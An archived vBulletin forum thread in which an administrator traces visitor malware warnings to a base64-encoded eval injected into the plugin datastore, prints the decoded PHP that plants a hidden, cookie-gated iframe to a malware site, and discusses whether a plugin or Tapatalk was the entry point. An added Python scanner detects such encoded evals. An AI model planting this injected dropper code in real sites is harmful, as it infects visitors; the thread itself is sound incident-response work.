vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions

#1  06-24-2010, 03:02 PM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)
Subject: new 0 day exploit? (bekebu.in / cuzelu.in)

I have noticed in the last few days my vB install has been trying to infect users with a trojan coming from bekebu.in and/or cuzelu.in.

http://support.clean-mx.de/clean-mx/...n&submit=query

Not sure if this was a new 0 day going around or not, but it may be worth someone's time to look into this.



--------------- Added 06-24-2010, 04:04 PM ---------------

I have blocked the /16 that those domains are coming from, and Google Safe Browsing doesn't come up with the malware warning anymore.

91.188.0.0/16

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55

http://www.senderbase.org/senderbase...g=91.188.59.55
#2  06-24-2010, 07:39 PM  ChopSuey (Join Date: Jun 2009, Location: Alaska, Posts: 2,140)

What file is calling that site?
#3  06-26-2010, 02:27 PM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64-encoded string.

Code:
\r\n@eval(base64_decode(\"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\"));
which decodes to

Code:
if (!isset($_COOKIE['xlov'])) {
    $xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
    $ifrand = mt_rand(0,111);
    $domb = "http: // www. fealatoc.co .cc/clo.php";
    foreach ($xb as $xbb) {
        if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
            echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000);
 var expires=expDate.toGMTString();
 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
            break;
        }
    }
}
--------------- Added 06-26-2010, 03:28 PM ---------------

The URL in the script code is broken on purpose.

--------------- Added 06-26-2010, 03:29 PM ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink:
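A small scanner for the pattern found in this post, added here as an example (it is not code from the poster, from vBulletin or from Tapatalk): it searches a dump of the plugin table or the pluginlist datastore for eval(base64_decode("...")) calls, decodes each one, and reports which of the indicators seen above (hidden iframe, cookie gate, user-agent check) the decoded code contains. The sample rows and the domain malware.example.invalid are constructed.

```python
import base64
import re

# Matches eval(base64_decode("...")) as it appears in a plugin row or in the
# serialized datastore, including the backslash-escaped quotes of a DB dump.
_EVAL_B64 = re.compile(
    r"@?eval\s*\(\s*base64_decode\s*\(\s*\\?[\"']([A-Za-z0-9+/=\s]+?)\\?[\"']\s*\)\s*\)",
    re.IGNORECASE,
)

# Strings expected in an iframe/cookie dropper but not in a legitimate plugin.
INDICATORS = ("<iframe", "document.cookie", "HTTP_USER_AGENT", "mt_rand", "SetCookie", ".co.cc")


def decode_b64(blob: str) -> str:
    """Decode base64 leniently: strip whitespace and repair missing padding."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def find_encoded_evals(text: str) -> list:
    """One finding per eval(base64_decode(...)) in the given pluginlist/datastore text."""
    findings = []
    for m in _EVAL_B64.finditer(text):
        decoded = decode_b64(m.group(1))
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "indicators": [i for i in INDICATORS if i.lower() in decoded.lower()],
        })
    return findings


# Constructed payload resembling the decoded code in the thread (placeholder domain).
_SAMPLE_PAYLOAD = (
    "if (!isset($_COOKIE['xlov'])) {\n"
    " if (strstr(strtolower($_SERVER['HTTP_USER_AGENT']), 'msie')) {\n"
    "  echo '<script>document.cookie=\"xlov=day;path=/\";</script>';\n"
    "  echo '<iframe width=\"1\" height=\"1\" src=\"http://malware.example.invalid/clo.php\"></iframe>';\n"
    " }\n}\n"
)
# Constructed excerpt of two plugin rows: one benign, one carrying the encoded eval.
SAMPLE_ROWS = (
    "plugin 1: $vbulletin->options['foo'] = 1;\n"
    'plugin 2: \\r\\n@eval(base64_decode(\\"' + base64.b64encode(_SAMPLE_PAYLOAD.encode()).decode() + '\\"));\n'
)

if __name__ == "__main__":
    for f in find_encoded_evals(SAMPLE_ROWS):
        print(f"offset {f['offset']}: indicators {f['indicators']}\n{f['decoded']}")
```

Feed it `mysqldump` output of the plugin and datastore tables; anything it reports should be compared against the plugins you actually installed.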
#4  06-26-2010, 02:46 PM  TNCclubman (Join Date: Sep 2008, Posts: 690)

You're running Tapatalk on your vB? Or is it just a clean install of vB?
#5  06-27-2010, 11:00 AM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)

We have been using Tapatalk for a while now. Last week a few members started getting virus warnings about bekebu.in and/or cuzelu.in. A few days ago, one of the admins at Tapatalk contacted us to let us know they had shut us down on their side due to the virus issue, and they have helped us locate some of this code.

--------------- Added 06-27-2010, 12:04 PM ---------------

fealatoc . co . cc info:

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7
#6  06-27-2010, 11:48 AM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)

Post Thanks 'Hack' got hacked.
[Attached image: Screenshot1.jpg]
#7  06-27-2010, 11:49 AM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)

Also reported to the Post Thanks author at https://vborg.vbsupport.ru/showpost....&postcount=948
#8  06-27-2010, 11:52 AM  BirdOPrey5, Senior Member (Join Date: Jun 2008, Location: New York, Posts: 10,610)

I guess the question is: did having Tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have Tapatalk installed, I'm curious too.
#9  06-27-2010, 12:17 PM  SomeDude-GP (Join Date: Jun 2009, Posts: 13)

Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the Tapatalk plugin. I think it's the Post Thanks 'hack' that is vulnerable, but this will need to be tested and confirmed.
#10  06-27-2010, 12:19 PM  yellowpeter (Join Date: Dec 2008, Posts: 599)

I am not sure either; the information is mixed, as some forums that didn't install Tapatalk also got hacked. But one forum found that a mysterious PHP file had been added to the Tapatalk directory, which caught our attention. So we went ahead and checked our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).

We have sent out an email to all forum owners to upgrade, so I hope to keep this infection to a minimum.